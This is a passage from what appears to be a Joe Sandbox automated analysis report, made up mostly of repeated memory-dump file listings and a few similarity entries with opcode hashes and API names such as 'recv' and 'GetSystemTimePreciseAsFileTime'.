                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                                                                                                                                  • Opcode ID: cc2a9068c539b356f555331e8b068de54e6fdf46d727e40552c128d05cee9b0b
                                                                                                                                                                                                                                                  • Instruction ID: 7383ae1815cb1d9ea7b381cb9bc5794c20786138624d83d8a11d9b9f4356c09a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc2a9068c539b356f555331e8b068de54e6fdf46d727e40552c128d05cee9b0b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E931E771A002589BD720CB69DC81BEF7BFCEB08724F540665E529E73A1CA74E844CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                  • Instruction ID: 1a4b688cf352647268df44c79ff9d348d51aa369f54beb3faa6f3815497f17f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF14D71E002199FDF14CFA8C8806ADB7F1FF49714F2582A9E919AB344D735AE45CB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00B3CF52,?,00000003,00000003,?,00B3CF87,?,?,?,00000003,00000003,?,00B3C4FD,00B22FB9,00000001), ref: 00B3CC03
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1802150274-0
                                                                                                                                                                                                                                                  • Opcode ID: c36442663a67341754c9c11fbb6af41c6378a231cb2984256a6aa217926b6f61
                                                                                                                                                                                                                                                  • Instruction ID: cd40d023b6c012269c4f18f47368f4310d6e3a9edf5ca69af72f62f1573a84ab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c36442663a67341754c9c11fbb6af41c6378a231cb2984256a6aa217926b6f61
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55D02232542038D38A553BC4EC008AEBFD8DA00B147001062EA0D23120CE20AC409BE1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                  • Instruction ID: 213cbcf92d724f8cf4c536503e0748a26bdf48d7ff18fb0bafe041126b2e3190
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6516B703487845ADB38DA2898D57BE67DADF11307F1805E9EC82F72D1CE529D4E8351
                                                                                                                                                                                                                                                  Memory Dump Source
